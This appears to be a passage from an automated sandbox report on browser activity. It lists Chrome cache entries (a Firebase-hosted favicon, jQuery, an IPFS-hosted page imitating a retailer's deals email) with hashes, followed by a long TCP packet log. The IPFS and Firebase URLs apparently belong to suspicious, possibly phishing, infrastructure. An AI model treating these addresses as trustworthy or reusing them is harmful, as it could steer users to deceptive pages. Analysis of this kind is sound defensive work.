SHA-512:	7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
Malicious:	false
Reputation:	low
URL:	https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=805fb0ef-a2d9-4a7f-85e6-d68384e166e3
Preview:	.PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:	1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	low
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	32
Entropy (8bit):	4.413909765557392
Encrypted:	false
SSDEEP:	3:2T5CZZ8mek:0CZZ8m7
MD5:	A5ED4BAF1E3EA02E3E8303106EBB791A
SHA1:	C583088EC025B992C59C4AA4B9543B38B3EB1FF5
SHA-256:	1403C7DC4D943C3C944027680B720C798AF62BF7B6D36B6CC2FD0C5F8E9EFC41
SHA-512:	D2072CD2BB901223A3B34AD98668CA6B2143286A56450B90C2984FF07AB446783AD72FEC3E5296CA773E5DC84A6240EA667C880C5D4B22A2AFF55C454619D5D1
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwnafXqpG7OCbBIFDbq_44ASBQ1MSZGY?alt=proto
Preview:	ChYKCw26v+OAGgQIVhgCCgcNTEmRmBoA

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (1705), with CRLF line terminators
Category:	downloaded
Size (bytes):	55407
Entropy (8bit):	5.481899219948928
Encrypted:	false
SSDEEP:	384:/VfMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDnMXDn9:/jJBaA6
MD5:	D0EB7045E8185F39786D730EC4797FA9
SHA1:	8C990E122CE9AE5ACAB54FF2E85C5F7D38B2F42B
SHA-256:	65787486D5A9E23FE92B12EC8AC56CF8105573C2980FC7EA1DA15CB66B1780EC
SHA-512:	4C43EA7804C29A4585BAADC286AD4378D16CFB55FB526F6A75D305A53BA789FC9BBC66A8C0A88F463A6A962AC356337A914C88CCD43E7550073F2C6884CC3331
Malicious:	false
Reputation:	low
URL:	https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5q
Preview:	.<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head>.. lJfw87er........,Shop in bo..Hi Yin..E-mail......Explore your weekly savings..Warm up with great deals on your faves.....Shop deals ..Discover today's top deals..See all..Image of Dyson V11. Advanced Stick.....Dyson V11. Advanced Stick.....AU $788.00....AU $1,199.00 . AU $411.00 OFF....Direct from Dyson Direct from Dyson....Image of AZDOME 4K Dash Cam UHD.....AZDOME 4K Dash Cam UHD.....AU $55.99....AU $71.99 . 22% OFF....Image of Perfect Choice Red Mixed Wines.....Perfect Choice Red Mixed Wines.....AU $65.00....AU $230.00 . AU $165.00 OFF....Image of EVERAU. Women Men Slippers.....EVERAU. Women Men Slippers.....AU $54.00....AU $99.95 . 46% OFF....Image of ALFORDSON Greenhouse Aluminium.....ALFORDSON Greenhouse Aluminium.....AU $199.95....AU $1,199.75 . AU $999.80 OFF....Image of BLACK LORD Kettlebell Set 20kg.....BLACK LORD Kettlebell Set 20kg...

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:	1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 01:47:49.559849024 CET	49673	443	192.168.2.6	173.222.162.64
Jan 14, 2025 01:47:49.716290951 CET	49674	443	192.168.2.6	173.222.162.64
Jan 14, 2025 01:47:50.028604031 CET	49672	443	192.168.2.6	173.222.162.64
Jan 14, 2025 01:47:53.405091047 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:53.409903049 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:53.578429937 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:53.585247040 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:53.585346937 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:53.590109110 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:53.590200901 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:53.590209007 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:53.590219975 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046390057 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046405077 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046417952 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046430111 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046469927 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:54.046536922 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:54.046766043 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046778917 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046789885 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046801090 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.046842098 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:54.046874046 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:54.047462940 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.047482967 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.047497034 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:54.047529936 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:54.091171980 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:56.166814089 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:56.166907072 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:56.171776056 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.171789885 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.171806097 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.171813011 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.171844959 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557332993 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557368994 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557379961 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557389975 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557420969 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:56.557502985 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:56.557737112 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557811022 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557821035 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.557888985 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:56.558345079 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.558356047 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.558365107 CET	443	49703	40.126.32.134	192.168.2.6
Jan 14, 2025 01:47:56.558394909 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:56.558429003 CET	49703	443	192.168.2.6	40.126.32.134
Jan 14, 2025 01:47:57.237647057 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:57.237690926 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:57.237761021 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:57.238437891 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:57.238454103 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.173537016 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.173682928 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.211663008 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.211690903 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.212680101 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.220710993 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.220777988 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.220784903 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.220891953 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.263375998 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.396336079 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.396549940 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.396604061 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.397382021 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.397406101 CET	443	49708	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.397420883 CET	49708	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.524033070 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.524080992 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:58.524143934 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.524650097 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:58.524667978 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.292933941 CET	49673	443	192.168.2.6	173.222.162.64
Jan 14, 2025 01:47:59.310172081 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.310276985 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.312788010 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.312803984 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.313615084 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.315819979 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.315903902 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.315912962 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.316077948 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.363328934 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.418082952 CET	49674	443	192.168.2.6	173.222.162.64
Jan 14, 2025 01:47:59.495083094 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.495292902 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.495395899 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.495663881 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.495692015 CET	443	49716	40.113.103.199	192.168.2.6
Jan 14, 2025 01:47:59.495704889 CET	49716	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:47:59.713129044 CET	49672	443	192.168.2.6	173.222.162.64
Jan 14, 2025 01:48:01.117281914 CET	443	49705	173.222.162.64	192.168.2.6
Jan 14, 2025 01:48:01.117393017 CET	49705	443	192.168.2.6	173.222.162.64
Jan 14, 2025 01:48:01.396140099 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:01.396190882 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:01.396318913 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:01.396580935 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:01.396596909 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:02.043199062 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:02.043448925 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:02.043483973 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:02.044924021 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:02.044987917 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:02.046092033 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:02.046179056 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:02.089580059 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:02.089597940 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:02.136456013 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:03.003575087 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.003634930 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.003669024 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.003669977 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.003751040 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.003957987 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.003957987 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.003990889 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.004103899 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.004141092 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.476244926 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.476514101 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.476537943 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.478221893 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.478288889 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.479299068 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.479413986 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.479465008 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.486973047 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.487298012 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.487363100 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.488825083 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.488900900 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.489162922 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.489248037 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.523370981 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.530134916 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.530154943 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.530224085 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.530253887 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.577068090 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.577094078 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.617393970 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.617522955 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.617588043 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.617590904 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.617624044 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.617743015 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.617757082 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.617854118 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.617943048 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.617959023 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.617969990 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.618007898 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.618030071 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.618182898 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.618230104 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.618238926 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.621891975 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.621968985 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.621980906 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.665652990 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.700093031 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.700275898 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.700366974 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.700387955 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.700411081 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.700647116 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.700730085 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.704540014 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.704590082 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.704602003 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.704821110 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.704878092 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.704885960 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.704916954 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.704961061 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.705071926 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.705251932 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.705308914 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.705317974 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.705547094 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.705580950 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.705590010 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.705697060 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.705785990 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.705840111 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.705848932 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.706082106 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.706466913 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.706623077 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.706707001 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.706715107 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.706733942 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.706789017 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.707223892 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.747359037 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.747378111 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.787986040 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.788064003 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.788085938 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.788166046 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.788204908 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.788238049 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.788239002 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.788254023 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.788274050 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.788366079 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:03.788516045 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.788691044 CET	49726	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:03.788710117 CET	443	49726	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:04.095029116 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:04.095065117 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:04.095148087 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:04.095701933 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:04.095712900 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.056759119 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.056989908 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:05.064179897 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:05.064199924 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.064584970 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.066049099 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:05.066117048 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:05.066121101 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.066209078 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:05.111324072 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.241085052 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.241292000 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:05.241345882 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:05.241509914 CET	49736	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:05.241523981 CET	443	49736	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:06.317823887 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:06.317922115 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:06.318109035 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:06.318706989 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:06.318746090 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.143086910 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.143214941 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:07.146985054 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:07.147000074 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.147872925 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.187598944 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:07.489311934 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:07.489473104 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:07.489484072 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.489654064 CET	49756	443	192.168.2.6	40.113.103.199
